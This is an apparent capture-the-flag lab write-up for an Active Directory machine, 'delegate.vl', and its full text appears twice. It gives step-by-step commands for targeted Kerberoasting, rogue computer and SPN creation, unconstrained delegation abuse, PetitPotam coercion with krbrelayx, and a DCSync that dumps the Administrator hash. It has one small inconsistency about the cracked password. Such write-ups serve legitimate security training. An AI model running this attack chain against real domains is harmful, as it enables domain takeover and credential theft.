Targeted Kerberoasting & Unconstrained Delegation In this scenario, we use a dangerous privilege over another user and a rare SeEnableDelegationPrivilege privilege to force the Domain Controller to issue us its "passport".
1.
Targeted Kerberoasting (Initial Access) After launching bloodhound under the user A.Briggs, we learned that he has the GenericWrite right over the user N.Thompson.This allows us to forcibly make him a "victim" of kerberosting. * Logic: If we have GenericWrite rights over a user, we can assign an SPN (Service Principal Name) to him, request a ticket and harvest the hash, that is, we make a service account out of a regular user, since only service accounts can be used. * Team: python targetedKerberoast.py -v -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123'
* Result: We were given a TGS hash, after which we get the password P4ssw0rd1#123 and access to the N.Thompson account, which is then found to have a critical privilege.
2. Enumeration Analysis We check the rights of N.Thompson and see a "gold mine": whoami /priv -> SeEnableDelegationPrivilege Logic: This privilege SeEnableDelegationPrivilege Allows the user to configure delegation for computers and accounts. This is the key to capturing DC.
3. Preparing the trap To exploit delegation, we need a controlled computer in the domain. # 1. Create a computer account stalkx$ impacket-addcomputer -dc-ip 10.129.234.69 -computer-name stalkx$ -computer-pass 'P@$$word123!' delegate.vl/N.Thompson:KALEB_2341 # 2. Adding a DNS record so that DC can find our "server" python3 dnstool.py -u 'delegate.vl\N.Thompson' -p KALEB_2341 -r stalkx.delegate.vl -a add -t A -d 10.10.14.199 -dns-ip 10.129.234.69 DC1.delegate.vl
4. Setting up SPN and bypassing protections For Kerberos to work, our stalkx$ needs SPN. We use a "two-pass" to bypass the Validated Write check. # First, register the name as an additional python3 addspn.py -u 'delegate.vl\N.Thompson' -p KALEB_2341 -s 'cifs/stalkx.delegate.vl' -t stalkx$ -dc-ip 10.129.234.69 DC1.delegate.vl --additional # Now we assign SPN to our server python3 addspn.py -u 'delegate.vl\N.Thompson' -p KALEB_2341 -s 'cifs/stalkx.delegate.vl' -t stalkx$ -dc-ip 10.129.234.69 DC1.delegate.vl * Logic: DC now sees our created computer as a legitimate file server.
5. Unconstrained Delegation Now use our main privilege to enable the "stealing tickets" mode on the stalkx$ PC. bloodyAD --host 10.129.234.69 -u N.Thompson -p KALEB_2341 -d delegate.vl add uac stalkx$ -f TRUSTED_FOR_DELEGATION * Tech: The TRUSTED_FOR_DELEGATION flag forces anyone who connects to that PC to send it a copy of their TGT (full ticket).
6. Coercion: PetitPotam & krbrelayx It's time to get the Domain Controller into our trap. * Start the listener: #krbrelayx will be waiting for a ticket from DC sudo python3 krbrelayx.py --krbsalt 'DELEGATE. VLstalkx' --krbpass 'P@$$word123!' -dc-ip 10.129.234.69 * Provoking DC (PetitPotam): # Exploiting Coerce to get DC to knock on our stalkx.delegate.vl python3 PetitPotam.py -u 'stalkx$' -p 'P@$$word123!' -d delegate.vl -dc-ip 10.129.234.69 stalkx.delegate.vl 10.129.234.69 * Result: DC1$ connects to us and, seeing the delegation flag, gives his TGT. krbrelayx saves it to the dc1.ccache file.
7. DCSync and Full Domain Pwn With a domain controller ticket (DC1$), we have the rights to replicate the entire AD database. export KRB5CCNAME=dc1.ccache # Run DCSync to get the Admin hash impacket-secretsdump -k -no-pass -dc-ip 10.129.234.69 -just-dc-user Administrator 'delegate.vl/[email protected]' * Total: Received Administrator's NT hash: c32198ceab4cc695e65045562aa3ee93.
1.Targeted Kerberoasting (Initial Access) After launching bloodhound under the user A.Briggs, we learned that he has the GenericWrite right over the user N.Thompson.This allows us to forcibly make him a "victim" of kerberosting. * Logic: If we have GenericWrite rights over a user, we can assign an SPN (Service Principal Name) to him, request a ticket and harvest the hash, that is, we make a service account out of a regular user, since only service accounts can be used. * Team: python targetedKerberoast.py -v -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123'
* Result: We were given a TGS hash, after which we get the password P4ssw0rd1#123 and access to the N.Thompson account, which is then found to have a critical privilege.
2. Enumeration Analysis We check the rights of N.Thompson and see a "gold mine": whoami /priv -> SeEnableDelegationPrivilege Logic: This privilege SeEnableDelegationPrivilege Allows the user to configure delegation for computers and accounts. This is the key to capturing DC.
3. Preparing the trap To exploit delegation, we need a controlled computer in the domain. # 1. Create a computer account stalkx$ impacket-addcomputer -dc-ip 10.129.234.69 -computer-name stalkx$ -computer-pass 'P@$$word123!' delegate.vl/N.Thompson:KALEB_2341 # 2. Adding a DNS record so that DC can find our "server" python3 dnstool.py -u 'delegate.vl\N.Thompson' -p KALEB_2341 -r stalkx.delegate.vl -a add -t A -d 10.10.14.199 -dns-ip 10.129.234.69 DC1.delegate.vl
4. Setting up SPN and bypassing protections For Kerberos to work, our stalkx$ needs SPN. We use a "two-pass" to bypass the Validated Write check. # First, register the name as an additional python3 addspn.py -u 'delegate.vl\N.Thompson' -p KALEB_2341 -s 'cifs/stalkx.delegate.vl' -t stalkx$ -dc-ip 10.129.234.69 DC1.delegate.vl --additional # Now we assign SPN to our server python3 addspn.py -u 'delegate.vl\N.Thompson' -p KALEB_2341 -s 'cifs/stalkx.delegate.vl' -t stalkx$ -dc-ip 10.129.234.69 DC1.delegate.vl * Logic: DC now sees our created computer as a legitimate file server.
5. Unconstrained Delegation Now use our main privilege to enable the "stealing tickets" mode on the stalkx$ PC. bloodyAD --host 10.129.234.69 -u N.Thompson -p KALEB_2341 -d delegate.vl add uac stalkx$ -f TRUSTED_FOR_DELEGATION * Tech: The TRUSTED_FOR_DELEGATION flag forces anyone who connects to that PC to send it a copy of their TGT (full ticket).
6. Coercion: PetitPotam & krbrelayx It's time to get the Domain Controller into our trap. * Start the listener: #krbrelayx will be waiting for a ticket from DC sudo python3 krbrelayx.py --krbsalt 'DELEGATE. VLstalkx' --krbpass 'P@$$word123!' -dc-ip 10.129.234.69 * Provoking DC (PetitPotam): # Exploiting Coerce to get DC to knock on our stalkx.delegate.vl python3 PetitPotam.py -u 'stalkx$' -p 'P@$$word123!' -d delegate.vl -dc-ip 10.129.234.69 stalkx.delegate.vl 10.129.234.69 * Result: DC1$ connects to us and, seeing the delegation flag, gives his TGT. krbrelayx saves it to the dc1.ccache file.
7. DCSync and Full Domain Pwn With a domain controller ticket (DC1$), we have the rights to replicate the entire AD database. export KRB5CCNAME=dc1.ccache # Run DCSync to get the Admin hash impacket-secretsdump -k -no-pass -dc-ip 10.129.234.69 -just-dc-user Administrator 'delegate.vl/[email protected]' * Total: Received Administrator's NT hash: c32198ceab4cc695e65045562aa3ee93.
